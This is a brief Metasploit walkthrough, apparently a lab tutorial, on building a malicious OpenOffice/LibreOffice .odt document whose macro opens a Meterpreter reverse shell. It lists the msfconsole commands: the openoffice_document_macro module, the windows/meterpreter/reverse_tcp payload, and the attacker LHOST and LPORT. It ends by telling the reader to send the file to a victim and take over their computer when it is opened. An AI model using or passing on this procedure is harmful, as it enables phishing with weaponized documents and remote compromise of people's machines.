This module generates an Apache OpenOffice Text Document with a malicious macro in it. To exploit successfully, the targeted user must adjust the security level in Macro Security to either Medium or Low. If set to Medium, a prompt is presented to the user to enable or disable the macro. If set to Low, the macro can automatically run without any warning. The module also works against LibreOffice.
Apach Open Office on Windows
Attacker: kali Linux
Victim PC: Windows 10
Open the terminal in kali Linux and type msfconsole to load metasploit framework.
Now type use exploit/multi/misc/openoffice_document_macro
msf exploit (openoffice_document_macro)>set payload windows/meterpreter/reverse_tcp
msf exploit (openoffice_document_macro)>set lhost 192.168.0.104 (IP of Local Host)
msf exploit (openoffice_document_macro)>set srvhost 192.168.0.104
msf exploit (openoffice_document_macro)>set lport 4444
msf exploit (openoffice_document_macro)>exploit
From the screenshot you can see the highlighted text is showing the path of malicious odt file.
The malicious odt File had been generated successfully which is stored on your local computer inside following path:
Now send your msf.odt files to victim, as soon as he download and open it, you can access meterpreter shell on victim computer.